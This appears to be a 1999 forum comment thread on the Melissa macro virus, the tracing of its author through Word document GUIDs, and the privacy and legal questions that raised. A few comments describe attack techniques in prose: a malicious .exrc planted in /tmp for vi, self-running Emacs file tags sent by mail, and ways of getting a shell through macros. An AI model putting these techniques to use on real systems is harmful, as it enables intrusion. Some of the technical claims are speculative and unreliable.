Of course, in order to be able to say this I had to NOT USE MICROSOFT PROGRAMS, so obviously I'm the loony, right? It's just, well, not normal not to use Microsoft programs. Even Linux users use Microsoft programs (on the average). At least I have the consolation of this: it'll be easier for me to convince the FBI not to have me shot as owner of the GUID, because there's never been any indication that I _could_ write macro virii, due to my lack of Microsoft programs
Such a world we live in! o_O
You mean, you haven't already? :P
Mine are in RTF, plain text, and I'm thinking about trying out HTML (hate trying to get everything lined up correctly though).
I think it's time for a new format (OTF maybe?)
There is nothing wrong with use PINE to do email. I have been for over a year and other than the fools that send me WINMAIL.DAT attachments it works fine! Hell, even works via telnet so I can be almost anywhere on the planet and still get my mail.
Sig (appended to the end of comments you post, 120 chars)
Posted by speed1:
This just shows how MS programs with poor security can lead to a invasion of privacy.
We can see in this case hows its being used to track the autor of Mellisa...how long will it take so they can track down anyone else.
As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certanly use this as a showcase.
On the other hand, doesnt the ease with which those GUIDs were traced suggest how easily everybodys privacy can be broken into?
I would say that with the right spin (where are those privacy groups when you need them?) this case could be a perfect demonstration of what the GUID/Privacy issue a few weeks ago was all about.
M$ blatantly mishandled their users privacy by putting GUIDs into each document that are so easy to be traced - even by outsiders, like those two guys from the ZDNet story.
Posted by Dr. Bert:
I'm all for crucifiction of digital vandals. But this is a perfect example of why I refuse to use Microsoft products for any reason.
Posted by skitzo:
I find it hard to believe that anyone could trust this stupid ID tracking system MS has embedded into their programs...I also don't know about the validity of this argument that they can even track the person who has created it. It seems like an overly bloated attempt to make something of nothing simply because of the quick spread of the virus. Lastly, anyone who has been infected ought to rethink their attempt to be computer savvy because it's obviously not working.
lataz...
Posted by Bryan Lawson:
Given that so many know vb, especially so many new young programmers who are still pumped with their rebel phase, and know (and have known for a LONG time - microsft?) how easy it is to create macro virii, I am surprised we haven't seen more Melissa types ages ago. We are certainly gunna see a lot more now, as the mutations and copies already surfacing show.
I just hope the media pick up on the fact that this wouldn't (couldn't) happen if ms showed at least a modicum of respect for user level security.
Remember, Kenneth Starr couldn't tape record Monica Lewinsky's phone conversations w/o her consent or a warrant, but Linda Tripp could as she is a private citizen and not subjected to the same restrictions as law enforcement.
... in others, completely illegal and inadmissible by Starr. I guess he was lucky it was in DC. *grin*
Laws regarding recording phone conversations vary from state to state. In some states what Tripp did was perfectly legal
My point was that the illegal search argument would be what I would use as a defense since there is no clear precedence set in this regard. Information obtained by a 3rd party without the defendants knowledge is very shaky ground in court, especially when it's a commercial 3rd party as Microsoft is.
If I planted a bug in your system (via a macro virus, yaay!) that logged all keystrokes and internet traffic, would I then be allowed to prosecute you when you went to a kiddie-porn site or downloaded the latest Quake III warez? I don't think so because I, as a 3rd party, violated your private space. I would actually be PROSECUTED as such. The argument can be made (and possibly successfully) that MS violated this person's private space by recording unique information about that space and broadcasting it publicly (even if embedded in a document now made public).
If you can read this message, your threshold is too low.
Essentially, MS Word does a type of digital signing on a document. If you release a signed file, well... too bad.
Since this digital signature is hidden from the user completely, I disagree that once you release the document publicly, it's your fault the data got out.
If Outlook attached your credit card number to each outgoing mail message without your knowledge, would you then be liable for all fraudulent purchases on that card since you sent an email? No, I don't think you would be.
I don't see how someone can be held responsible for consequences of sending out data that they do not know is being sent.
If you can read this message, your threshold is too low.
Just as it's not a problem for the Gov't to take fingerprints off a letter that you sent or DNA samples from the saliva you used to lick a stamp or an emvelope shut. Once you voluntarially give something up, it's fair game for the man.
... the unknown data attached to it without your consent by a 3rd party should not fall under these same rules.
I agree completely, except that until recently, no one even KNEW they were giving up their MAC address simply by publishing a Word document. Considering how new this knowledge is, it's safe to say that many STILL do not know.
You can only voluntarily give up something you KNOW you have
How many people (beyond slashdot) even KNOW what a MAC address is and how it's created?! I would venture a guess that 65% of computer users are clueless about this aspect of networking technology.
If you can read this message, your threshold is too low.
I will have to research the cases you site, thanks for pointing those out.
I find it very hard to swallow however, that evidence gained from illegal activity is admissible in court in all instances. If this were the standing precedence, why wouldn't the cops simply get non-cops to break into people's houses to search when they can't get a warrant? Why wouldn't they get non-cops to plant bugs and cameras in crack houses to get evidence?
I think there may be a fine (although gray) line between inadvertent discovery during a crime and out right pursuance of evidence during a crime. This may explain why if you found a body in my basement during a B&E, I would get charged but if you went in and planted a camera for the specific purpose to taping what I do in my own house and that tape caught the killing, that would not be admissible. (However, I'm sure it would be enough to get me arrested and the body found subsequent would be enough to convict me. *grin* There is a big difference between evidence required to arrest/detain and evidence required to convict.)
To me this is a clear distinction. The MAC address is not attached to the word doc by chance, it was programmed to do that, specifically. This "theft" of unique personal data was not inadvertent, rather is was blatant.
If you can read this message, your threshold is too low.
First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.
.doc files as "recently discovered".
What spec? Since word documents use a proprietary format, I don't think there is an open spec available for inspection by the public. If there IS such a document, please point me towards it. If there is NOT such a document available to the public, then I would still consider embedded MAC addresses in
The ZDNet article also goes into detail about how the GUID was matched with another GUID from a document on a website owned by a known virus author. Considering the uniqueness of the MAC addressed utilized in the GUID, it is highly unlikely, if not impossible that the two documents were not created by the same machine.
The report never mentioned anything about using the gather MAC address from Windows 98 registrations to track down this person. Where are you getting that from?
If you can read this message, your threshold is too low.
Your points are very valid regarding current privacy statutes. My point was that this is uncharted waters and the argument could (should?) be made against 3rd party distribution of our unique data without our knowledge.
People are well aware of Caller-ID and there is a publicly available mechanism to disable this feature. I have no problems with that.
I'm not suggesting this argument to get around the crime itself, I'm suggesting it as a way to protect others from being victimized for non-criminal acts that my be unpopular.
If it stands that 3rd parties can "implant" everything you do with an ID that you do not know about or cannot turn off, free anonymous speech will disappear as we know it. That's my main concern.
If you can read this message, your threshold is too low.
I wholeheartedly agree. Many are missing the bigger picture in this instance.
If federal authorities USE this 3rd party tracking mechanism to convict, it will VALIDATE the notion that anyone, as long as they are not law enforcement, can implant people, their ideas, and their works with hidden identifiers to track them down at a later date.
In many respects, this is similar, if not identical to key escrow.
If this evidence IS used against this person, Bell Atlantic/Pac Bell may just start tapping our phone lines TOMORROW with the off chance that we will say something that can be used against us in court. It would be the same thing since it's a 3rd party, NOT law enforcement, invading our privacy to gather evidence against us.
If you can read this message, your threshold is too low.
I'm not sure if use of such GUID's would hold up in court since it is private information gathered by an illegal search. The user did not give permission for his unique ID to be attached to his .doc file. The app (Word) had no just cause to attach this ID either so it's similar to having the feds tap your phone without a warrant.
.doc and posted it online?
While I am not defending this moronic macro virus creator, I do think that utilizing these GUID's is setting a BAD standard in regards to a person's right to publish anonymously.
What's next, they track down the GUID of the person who wrote an anti-Clinton
If you can read this message, your threshold is too low.
It used to be that the biggest security hole in any network was a badly configured firewall (or lack thereof), now it's MS Word and MS Outlook!
...
I can just see the day this was decided at The Collective
[Insert wavy flashback effect]
Five of Seven: "Hey, Three of Five, let's give Word the ability to run external executables!"
Three of Five: "Cool! But let's make it so that it can do this from within a macro!"
Five: "Sounds good. How about we add a startup macro that launches when the document is opened?"
Three: "Hmm, should we allow the user to turn off startup macros?"
Five: "Hahaha! What for? No one is going to use this for evil! This is a Good Thing[tm]!"
[Fade back to present]
Sad, just plain goddam sad.
Boobies never hurt anyone. - Sherry Glaser.
This just gets down to the point.. we really need easier ways for government and industry to track our movements. Perhaps something injected into the arm at birth that would constantly relay a signal to a series of receivers? This way we can easily track those evil criminals and bad people and find lost children and do all kinds of good stuff. :-) *sarcasm*
Hey, I like word macros.
How else are you supposed to get a shell on a system that's "secured"? (okay, I know, there are tons of ways, like Excel macros, or not-disabled Windows function keys, or changing, say, the Telnet proxy in netscape to run the command interpreter...)
I think one of my favorite oxymorons is "Windows Security". It's a good analogy, too. Want to break into a house? Break a window.
pb Reply or e-mail; don't vaguely moderate.
Heh. I'd been thinking the same exact thing when I saw this headline on the front page. Gee, wouldn't it be interesting...
Sam: "That was needlessly cryptic."
Max: "I'd be peeing my pants if I wore any!"
My understanding was that it was a VBscript macro virus. So basically, unless you open a Word/Excel/whatever document up that contains the macro virus, it has no scripting host to run on, so you can't pick it up that way.
Sam: "That was needlessly cryptic."
Max: "I'd be peeing my pants if I wore any!"
My understanding was that it was a VBscript macro virus. So basically, unless you open a Word/Excel/whatever document up that contains the macro virus, it has no scripting host to run on, so you can't pick it up that way.
Sam: "That was needlessly cryptic."
Max: "I'd be peeing my pants if I wore any!"
Did you READ the article?
If you had, you'd note that it said the GUID number is in part based on the MAC address of the system's Ethernet card. Please, read the article next time. You'll be more informed, and everyone will be happier.
Sam: "That was needlessly cryptic."
Max: "I'd be peeing my pants if I wore any!"
Absolutely! It is a very slippery slope, and we've already started down it. I notice that ID chip implants are already becoming common for pets. That gets the chips into mass manufacture, and gets the chip readers out there.
The next 'great beneficial use' will probably be the mentally infirm. Once it helps out there, children will be next. Don't be surprised to find out it's a lot easier to get the chip implanted in a 3 year old than it is to have it REMOVED from an 18 year old. (beyond the fact that it's harder to dig one out than to put one in).
That some loser on AOL wrote a virus for the biggest abomination of an office suite on the planet? This goes back to the monkey theory, I think. Heh. :)
First of all, some of the mailservers were put out of operation, and some sites had to disconnect mail service. That's harm.
Second, the change in machine state causing an undesirable activity is vandalism. Painting the next Mona Lisa on the side of a building would be vandalism, even if the owner was then able to sell the wall for $1M.
Third, while it may impose no additional cost to the victim, sending mail from his machine was an act with economic value; the improper use is theft and/or trespass.
Fourth, the message sent would be likely to cause problems between the sender & recipient.
I see no way in which the virus *isn't* harmful.
hawk, esq.
If you're looking for me to argue that MS products are any good, look elsewhere :) The last ones I have *anything* non-negative to say about are word 5.1 and excel 4.
But harmful as the products may be, and even if they're more dangerous than the virus, the fundamental legal difference is permission (except for transmission of data to microsoft, which would also violate assorted laws)
hawk, esq.
It's not the *writing*, but the willful and knowing *release* of the virus that's a crime.
The Common Law, and I presume most other legal systems, attribute the same intent to the natural consequences of an act as the act itself. Even without any modern "computer" crimes, the release & spread created numerous criminal trespasses against chattels (improper contact with machine), vandalism, and (the law of the individual state permitting) a general common law misdemeanor.
Larceny (theft) probably wouldn't cut it in this case, as an element is the intent to permanently deprive.
hawk, esq.
And no, this isn't legal advice.
While I am probably being paranoid and overly
sceptical, it's way too convinent that the
Win98 ID bug, only uncovered recently, is
suddenly going to be the life saver for solving
the Melissa problem. And all only 2 weeks
before the anti-trust trial resumes.
But, even if this is the case, I really wish
there was something that could be done against
M$ for introducing the entire concept of Word
viruses to the world; if they had introduced
the security needed into the vis basic routines
when they first put out Word 6, things wouldn't
be as rampent now.
Plus, this only goes to show that when only
one company makes all the programs that you use,
it's rather easy to find all the loopholes between
them all. (Hint, there's better, more
established ways to do interprocess communiction
that a propriatary system).
"Pinky, you've left the lens cap of your mind on again." - P&TB
"I can see my house from here!" - ST:
the interesting thing is that the virus doesn't *DO* anything harmful, except spam mailservers.
-Stu
Since a word document only has the GUID of the original document author, and all these Word Macro viruses are made by taking somebody else's Word Macro Virus (WMV) document and modifying it, all the GUID does is point back at some guy who wrote the original WMV that was the grandfather of Melissa. See this article
for more details.
The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
"Ten years from now, they could do it in a few seconds." -- The Racketeer of the Hellfire Club, 1993, Phrack 42
And this is different than Emacs how?
Oh, I forgot, Emacs uses Lisp.
SPF support for most open source mail servers can be found at libspf2.
NO!
Vi used to execute the .exrc file in any directory, including /tmp. You would simply leave a nasty .exrc file in /tmp, wait for people to use a program such as a mail reader that forks off a copy of vi to edit a temporary file and *poof*, you have got them!
With Emacs, you can put the special tags in any file, and if the are close enough to the start of end of the file, they used to be silently executed. Just email someone with the tags at the end, and if it is the last message in the mail box, *poof* you have got them!
Ten years ago, these were the *DEFAULTS* for two of the most popular editors on UNIX. They were used in universities which had large numbers of users. UNIX was the most common OS on the Internet. It was a serious problem. The UNIX folks had to learn to set the defaults correctly, just like I hope MS (and other software companies) learns. It is just too bad they didn't learn from the past.
SPF support for most open source mail servers can be found at libspf2.
VI used to read any ".exrc" file in the current directory, which could be used to create macro virii. To the best of my knowledge, this option is now turned off by default. (I don't use vi much...)
Emacs will execute code that is embedded in a file if it has the right tags around it. For example, I have this glob at the end of my .mailrc file:
About 10 years ago, emacs was changed from automatically and silently running this kind of code, to having the code displayed to the user and a y/n prompt given. Before that time, it was possible to trick Emacs's RMAIL command to propogate a virus through email.Still, I am not sure that Emacs's solution is that great. You can still turn the prompting off, and it assumes that the user knows enough about Emacs and Lisp to understand the code.
I think the real difference between OSS and MS is that OSS ran into these problems long before the Internet became aware to the general public.
SPF support for most open source mail servers can be found at libspf2.
not a month ago, we were having such a fit about MS IDs, and now, a *news-making* macro virus hits, and, TADA! A legitimate use is found for the MS ID.
Too, too funny. Nice try, Microsoft.
Stating on Slashdot that I like cheese since 1997.
User space has nothing to do with it. Or do you suddenly not have the ability to send email from the command line from your user account?
The reality of this is that StarOffice suffers from the same problem, especially since it can run MS Office macros.
Matt. Want XML + Apache + Stylesheets? Get AxKit.
You know, I think what scares me most about this is that the punishment in the US for a computer crime is tougher than the punishment for lots of other crimes. Oh, say, domestic abuse or something like that. So, it's worse for someone to write a macro virus than to slap their wife or girlfriend around.(husband or boyfriend too just to be P.C.) There's something basically wrong with that.
I've had computer viruses. Monkey2 and Ripper to be specific. I remember how utterly frustrating they both were. I do think that there are things much worse however. Keep it in perspective is all I can say.
I dunno. I guess what it comes down to is that I think this says something about our misplaced & completely fucked up value system.
-Randy
- Kate
"DNA is life. The rest is just translation."
But that would be too obvious.
"L'IT c'est moi!"
In point of fact, a user must already have write access to your .mailrc and .emacs files (implying that your account was already insecure) to instigate the sort of "virus" you've pointed out above. Also the code that enables this sort of behaviour is not found in the default versions of these files distributed by OS or application vendors. MS products are *BY DEFAULT* vulnerable, and the malicious user needs no special access to your machine or files to propagate his attack. This is not the case on most other properly administered and installed OS's.
Yet another wonderful aspect of this invasion of privacy is that anyone with a clue could frame anyone that person could get a sample doc from. Releasing the Skyrocket address to the net at large was irresponsible behaviour based on what amounts to heresy based on an invasion of privacy.
As you pointed out, while strings will give you some juicy tidbits, you can't extract the full macro contents that way (does MS tokenize their VB text?). Neither word2x nor mswordview do anything with macros. LAOLA includes a tool called ELSER which dumps out embedded macros, but it doesn't work with Word97 documents (which Melissa is). The mswordview site even linked to a DOS program called List Word Macros which I tried, and it doesn't support Word97 either.
I'd really like to see a dump of this virus, because I'm curious to see exactly what kind of insecurities a macro language would need to have in order to let the author both scan an address book and send email, without doing anything too suspicious in the UI. Does anyone have any better tools for looking at this file?
--
Jake
Regardless of the privacy implications of GUID storage in Microsoft documents this story is fishy. There's a vast number of documents written with these products and thus a vast number of GUID's floating about on the internet. To be able to pull up an individual and point the finger at them this quickly is unrealistic, especially given that they say that they found the matching GUID on a web site. They would have to exhaustively search web sites for documents containing the GUID and perform a match on them in order to do this.
The size of the internet says that this isn't possible. If there is any truth to the story at all it means that this guy was under some other form of surveillance and for that reason his documents were specially selected to be matched. Or it could mean that some portion of this is a sham, maybe the guy was never caught, maybe it was a propoganda ploy by either Microsoft or somebody who boosts Microsoft.
Until this story is confirmed by a somewhat credible news site I'll chalk off the capture of the perpetrator as an urban legend.
have recieved reports from catdoc users, that they was able to read future plans of their bosses, which wasn't intended to be sent just now.
yeah, that's a feature of word's "fast save": it uses versioning. so the old text is still there, but not displayed!!
I heard of someone who used catdoc on a job offer he got, and he was able to read the money they had offered to another person!!
and to think the corporate word relies on Word!!
I use Friend/Foe + mod-point modifiers as a karma/reputation system.
Couldn't the feds press charges of terrorism, which carries very severe penalties (life imprisonment and the death penalty are both options) against the virus author? Maybe someone will figure that if they make an example of one cracker, others will be "scared straight".
Since when was it illegal to write a virus?
Since a few virus scares back when politicians passed a specific law about writing viruses (or so I recall).
In this age of information, terrorism need not be physical. With most wealth existing as information outside of physical reality, and companies founded on the shuffling of bits, an "infowar" attack against a strategic economic target could do much more damage than any reasonable number of car bombs. Why blow up the Yoyodyne building when you can instead shoot down their stock price, decimating their value and causing much more damage? Or if that's not spectacular enough, cripple their communications system.
Which is not to say that Melissa is a political or economic terrorist attack, though the age of electronic, entirely non-physical terrorism is coming. It makes much more sense. The future of terrorism looks more like the Sense/Net raid from Neuromancer than the World Trade Center bombing.
It's kinda funny to see the letters AOL on anything that has to do with remotely stupid things.
.doc file wich they found on usenet and dont disable macros.
Though I'm still not sure what frightens me the most; "Virus" coders who leave the door open for prosecutors, M$ software that enables people to track down the author of some word document or thousand of alt.sex regulars who open a
Strange Times... the future sure should get funny
Executable documents are just plain wrong.
No, they can be made secure and sometimes they can even be useful (especially when you use interactive documents instead of regular applications, for example in a list that checks the consistency of new entries). The problem is that it is extremely difficult to make this secure, and it looks like Microsoft is not putting much effort in making VBA programs embedded in Office documents very secure.
Netscape is quite successful at making HTML+Java/-script quite safe. They are not perfect, as the technology is evolving much too quick, but it is definately a proof-of-concept.
(The above paragraph should not leave you with the impression that using Javascript on a HTML page is a good thing - of course you should use LML and Javascript is evil).
This GUID only applies to macro viruses (for MS office programs) or for viruses compiled with an MS compiler. Anyone who wanted to eliminate identity traces could, without too much difficulty, hand craft virus code (either hand assemble, or something similar) to not only eliminate all traces of his/her identity, but also streamline the virus to be leaner and meaner.
As far as I understand the Ethernet specification, although the MAC address, upon which the GUID is based, is set in the factory, it is supposedly resetable by the user with a special utility. (In other words the ID number that is being tracked can be changed.)
So, basically, only malicious hackers who don't know what they are doing, or innocent bystanders will be tracked... also, said hacker could easily fram someone else.
Also, I don't see your justification for assuming everyone who advocates privacy is guilty. Have you ever said anything illegal on the phone? (I doubt it... almost anything you could say on the phone is protected under the 1st ammendment.) That said, would you be mad if I suggested all the phone calls you ever made were taped, and would be played before a grand jury? I know I would be livid.
Note: I used the the word "hacker" above (and not "cracker") because a "cracker" is one who cracks into other's systems. Not all malicious "hackers" are "crackers". Whether writing a virus to attack other's systems constitutes cracking, I will leave as an exercise for the reader.
Loren Osborn
Loren Osborn
Ban guns, guns kill people
Ban the internet, the internet spread the virus
Ban microsoft, microsoft sw spread the virus
Ban computers, computers the spread the virus
Isn't this all kinda silly? Let the guy/gal who wrote this thing take the fall. Let everyone
take in this lesson and learn from it. Make it a big trial, have lots of publicity, make the person
pay for the rest of their life, make it a big example. This is what they now do for people
who start forest fires, they bill them for the damage. I don't see how this is any different.
I'm sure mr. mitnik has an opinion on this...
i don't know... i was about to post the same thing. this seems way too convenient... how could they have tracked the GUID on the other document that fast?? to me it's almost obvious that this hit came from inside.
"The lie, Mr. Mulder, is most convincingly hidden between two truths."
--
And Justice for None
we're not that far away from that! check out 666!
"The lie, Mr. Mulder, is most convincingly hidden between two truths."
--
And Justice for None
Essentially, MS Word does a type of digital signing on a document. If you release a signed file, well... too bad.
The fact that MS Word doesn't give you the option of turning this off is yet another reason not to use it.
It looks like it FTP's something to 209.201.88.110(codebreakers.org).
I have to return some videotapes...
With all of Micro$oft's sneaky "let me embed all your vital information into all the documents you create" attitude, whatever happened to privacy? Granted, I don't necessarily condone malicious behavior, but any idiot that accepts M$ Word email attachments as normal and reads them deserves to get screwed. Whatever happened to plain text? Bah. M$ can kiss my ass. And because I don't run M$ garbage, Melissa can kiss my ass too.
It works out how to spread by reading your Outlook address book. If you don't have one of those, you aren't part of the problem.
-----
-----
I tried an internal modem, but it hurt when I walked.
(Of course it's less of a resource hog than Outlook.)
Sanity.html - Error 404 not found
...how a total lack of intelligence can look incredibly much like a conspiracy?
MicroSoft: "NT! It's so incredibly easy to administer that all you need to know how to do is point and click!"
Yeah, ok. So where is the nifty pre-packaged little button labelled "bounce all incoming and outgoing messages with the target string in the message body back to sender, with an explanation for why it has been returned"?
It is impossible to make system administration doable by a trained monkey -- there are entirely too many contingencies.
On a similar note, RAD techniques and user coddling combined lead to this kind of thing -- incredibly overly-large, overly-featured, user-coddling pieces of bit-rotted sludge that leave massive doors open, which you cannot close because the so-called "administrators" are busy clicking around with their mice all day, and we keep the users stupid so they don't know that there's a better way.
Bah.
Calling it a virus seems legitimate to me. The defining feature of a computer "virus" is self-propagation, which Melissa does quite profusely. The fact that it needs to be run through an intermediate step shouldn't detract from it self-perpetuating nature.
I believe I read that Rudy Giulani wanted to collect DNA from every infant at birth. I guess if I knew someone like him had my DNA, cloning would seem like a Good Thing.
---- "If we have to go on with these damned quantum jumps, then I'm sorry that I ever got involved" - Erwin Schrodinger
It doesn't seem likely that MS will every plug its gaping holes (Bill Gates's mouth, and the security ones). It's easier to shift or hide the blame. AP had an article on the virus yesterday that didn't mention MS or Word even once.
---- "If we have to go on with these damned quantum jumps, then I'm sorry that I ever got involved" - Erwin Schrodinger
Visual Basic is not part of the HTML standard... what you are talking about is a virus that ONLY affects Windows users who are running MS IE.
Good thing too. Isn't this what Darwinism is all about? Hee hee.. don't see NEARLY as many virii on Linux or MacOS (nasty exception: HK automount virus).
Anyways, back to my point... VB is the same rotten core found in Office - HTML has nothing to do with it. The "finder" of this virus tried to whip up a media scare about HTML, and FAILED...
there is no excuse, and there never will be a valid excuse for violating privacy, no matter what the offense might have been(be it computer virus, murder, terrorism). yeah, maybe you can catch someone doing something bad if they used a M$ product to right the ranson/threat because gates violated their privacy, but what if they used vi?
three can keep a secret, if two are dead - benjamin franklin
As far as I'm concerned, who cares! Its an invasion of privacy none-the-less.
"our prying gov't." here in ireland we elect our gov't. we can vote them out. last i checked, i didn't get a chance to vote for the ceo's of irish companies, never mind american ones.
in case you didn't notice my dear little clueon challenged friend, a private company (being sued by, among others, several gov'ts) came up with the guid.
try voting, running for office or (if you don't have a representative gov't) overthrowing the dictatorship you live in (and surprise the world by replacing it with something that isn't a dictatorship). hey, and in the free time you'll have that's not spent whining you can get a clue!
bonus!
US Citizen living abroad? Register to vote!
The Microsoft security website all but explained to this virus author how he should write his virus.
Microsoft Security Bulletin 99-002 points out the "vulnerability in Word 97 which could permit macros to run without warning the user when the user opens a document based on a template containing macros." Melissa modifies Word templates to do exactly this.
Microsoft's webpage continues with the warning "A malicious hacker could exploit this vulnerability to cause malicious macro code to be run without warning if a user opens a Word attachment that was sent by a malicious hacker..."
This security bulletin was posted to the Microsoft Knowledge Base on January 21, 1999.
Buried in their website, the page lamely suggests that "all affected customers" - i.e., every one of the tens of millions of Word users! - "download the patch to protect their computers." Those customers have had over two months to do exactly that, and the tiny fraction who did are presumably at least partially immune to Melissa's spread.
Posting to an obscure security webpage hints on what might make an effective virus - a virus for which the only fix is tens of millions of separate patch downloads - is asking for trouble. Microsoft created the problem by coding a laughably insecure macro language into their applications. And they may have turned the potential problem into a real one by calling attention to it.
"Security through obscurity" is never desirable, but when the system is already as broken as the Microsoft macro language and when the user community doesn't give a damn about applying patches, it might have been a better alternative.
(Credit to TBTF for the link.)
Jamie McCarthy
Jamie McCarthy
jamie.mccarthy.vg
So how should we feel about this? The ZDnet article only discusses the facts of the situation, which is as if should be, though there's a slight air of "this privacy-invading software feature helped catch a bad guy so it's OK" to it.
Is it good that the author's been traced? yeah, I suppose so. Doesn't matter all that much really, but I dislike viruses and their authors as much as the next person. If there's good enough proof that this is the author, and some damage can be shown, then I suppose I'm all for prosecuting.
But I care a lot less about that than about the way they caught him. It seems to me we can't just go along, and say what the ZDnet article seems, ever so slightly, to be implying: that it's all right for MS (and by extension, Intel) to build identifiers like this into their products so that anything people who use those products do is traceable, just because once it helped catch someone who was doing something illegal. That's like saying "sure, the FBI can go ahead and install a wiretap on everyone's phone--fine by me, I'm not doing anything illegal, and only people who are would have to worry about that." I don't think anyone in their right mind would agree to something like that; and it violates all the principles on which our legal system is founded: "presumed innocent until proven guilty."
It's good that they caught the author of the virus, if that were all that this meant. But it's not. I hope they don't try to prosecute unless they obtain stronger evidence, through more valid means; and if they do prosecute, I hope they don't try to use the Office-ID-number-trace in court. If they do, we're all going to have to start worrying. And looking over our shoulders.
Pancakes is the better part of valor.
There are a lot of administrators out there who just can't get enough of Micos~1. I know, I work with two of them. Micros~1 everything. Of course they are - what a coincedence - not very bright and I have no idea why they have their jobs, but that's another story.
When I pointed out that "melissa" was merely taking advantage of weaknesses built-in to Micros~1 Word, they just grinned and shrugged, as if to suggest that I'm some sort of conspiracy obcessed wacko who needs to be ignored or just laughed off. Ughh.
support gun control: take guns from cops
> That's like saying Ford should get sued when
> there's a hit-and-run
With a hit-and-run, the design of the car is not a major factor.
No, it's like saying Ford should get sued if, say, a poorly designed car door falls off of the car at 60mph and someone goes flying. Negligent design; that sort of thing.
Can you really say that Microsoft's repeated and continuous failures to implement proper security measures (i.e. levels of priviledge combined with appropriate sandboxing to enforce same) for macro code are _acceptable_?
DNA just wants to be free...
Note, that in Safe-Tcl it is even prohibited by default to create toplevel windows. It is very annoyng to see advertisement windows pop up on your screen when you browse certain site.
Of course, writing to arbitrary files is prohibited to, and reading user files is allowed if and only if no socket operation is allowed.
This is a bit restrictive, but sensible security model. And Java and Javascript are plain security hole, smaller that Active-X or Word docs, but big enough for me, to keep both of them disabled in my Netscape.
RTF once stood for Revisable text format
And how are you going to edit your PDFs?
You don't run Emacs as root? And what do
you use to edit config files in this case?
Or you have some clever script
which does
chown you $1
su you -c "emacs $1"
chown root $1
One of reasons I prefer vim to emacs is that
I can edit configs in my favorite editor
and don't have too much byte-compilied lisp
running as root while doing so.
I would tend to believe that someone who is
stupid enough to write on WordBasic for self-expression (and what other purpose such viruses have), doesn't probably know enough
of hex editors to falsificate GUID.
And why care about some ID number while you
are willingfully sending out big chunks of
arbitrary information from your computer with
word file (which can contain your dialup password,
private mail and even secring.pgp), waiting
only for someone with LAOLA to investigate it.
I have recieved reports from catdoc users, that
they was able to read future plans of their bosses, which wasn't intended to be sent just now.
Imagine surprise of boss when emploee begin to
discuss with him plans, which weren't even send
(in boss opinion)
>onsense. It's just a macro virus, not a balanced AVL tree. It doesn't take a genius to write a macro virus.
It also doesn't take a genius to replace a few bytes in one file with those from another. If
everytime the doc were saved it also saved a MAC (as in an encrypted hash) with the windows global
id, then we could talk about proof. As it stands, there's nothing.
"The newsgroup alt.sex is not on this news server"
DAMN the man! And DAMN college news servers!
ZDUK says here that it's not so straightforward. Apparently the GUID is only inserted when a document is first created -- after that, copies and extreme mods leave the original GUID intact. And since most of us copy some other document and modify rather than create from scratch, the GUID is not particularly useful.
--
Infuriate left and right
Melissa and Skyroket's previous efforts were created before the whole GUID mess erupted into public.
\
How much you want to bet the dumb bastard DIDN'T go through the basic effort of spoofing his GUID and AOL accounts?
\
You cannot write a bytecode verifier, in the Java sense, for X86 assembler. This is one of those things people keep missing. Java's bytecode is typed. That means you can prevent things like casting integers into pointers, which would otherwise be possible.
Well, I guess I got lucky.... most of the users here at IPFW are in love with Word Perfect... we do have MS Word on the lab machines, but any problems with those and we just have to re-ghost the drive image back to normal.
The article says they compared the GUID to other GUIDs in documents on the suspect's web site and found that they matched. Still dosen't prove it was him and not a disgruntled script kiddie, but at least it shows how they traced the GUID.
Even if you don't use MS products at all you can still be the victim of an inbox full of email with lovely infected Word docs. Sure, you don't get harmed by the virus directly, but you still have to deal with the effects.
DFL
Never send a human to do a machine's job.
First off, well said, Mr. Madin.
This piece clearly implies that the MSID is a powerful law enforcement tool on the Digital Frontier. (BTW, I thought the out-of-nowhere references to the FBI were a nice touch.) That idea doesn't hold water, for a number of reasons. Apparently, ZD will gratuitously reinforce their message with questionable stuff like that FBI reference, but won't do the homework necessary to refute arguments that logically arise from their implied assertion.
If they can be refuted, I don't think they can.
First, there's no reason this will ever trap another hacker again, malicious or not. None. Anyone smart enough to write a Word97 macro is smart enough to obtain their own MAC address, scan the file for it, and remove it.
Is the address encrypted? The article doesn't say, which leads me to believe that it's not. Even if they do end up encrypting the thing, how hard will it be to decrypt? The only people you'll track down with this will be script kiddies killing time. Hackers knowledgeable enough to do genuine damage to a defended infrastructure are knowledgeable enough to find this ID and neutralize it.
"But that doesn't apply to the Intel ID," I can hear the ZD sycophants opine, "the Intel ID is a hardware ID, and no hacker can erase that!"
Fair enough. And the MAC address isn't?
In order for this ID to be useful in tracking down the origin of a virus, it has to be propagated in a file. Any file can be searched and have its contents modified. Period. The kind of ID you have makes no difference after it's overwritten.
So this ID will only end up in documents that are:
So the only people the ID can track are law-abiding citizens who don't care to remove the ID because their intentions are not malicious. Now why would you want to track them?
The answer is left as an exercise to the reader.
phil
What does this have to do with IPC? Macros are scripting, scripting is good. Unsandboxed bytecode not good, but all it takes is a language that can narrow its namespaces to secure it (something both Perl and Python use to sandbox their code). The CONCEPT of macros in documents is not at all bad, the implementation of the scripting interface is what sucks. I don't get it, IE will warn you about scripts and can even check script signatures. Why can't the same be done for VB and VBA?
I've finally had it: until slashdot gets article moderation, I am not coming back.
So, is there any hope of class-action against Microsoft for Negligence... if not stupidity? If they want to fine the author... the Government should also fine the inspiration. (Irony-- MS Still had to shut down their own e-mail servers...)
If you are using FAT16 (Win95), then the file itself takes maybe 16k or 32kb (minimal cluster size), depending on your partition.
While I fully agree that MSWord, MSExcel et ale writes lots of crap (including chunks of your RAM with your passwords), it still has no sense to argue about filesize.
Though, I often get puzzled HOW coders at MS could program, that simple inserted GIF or JPG of 30k, bloats document to 400k or something. They do store it as BMP and probably 3-4 times (to make it faster loading????)
AtW,
http://www.investigatio.com
alexc
Join Majestic-12 Distributed Search Engine
On a tangent, I have to say that any virus that strikes only Outlook users must be seen as beneficial in the global sense.
Only Microsoft could have taken a task as simple (by design!) as reading e-mail and evolve it into a beast that takes at least 8 MB of memory when running. Strangely enough, even Microsoft's own Outlook Express tool is far lighter and friendlier, without making you feel like you're firing up Word just to read an email.
"Less is More" evidently isn't a design addage that is used much at Microsoft.
Don Box is a well-known COM expert. He wrote this script that generates GUIDs in the open, without MAC information:
GUID generator
have fun.
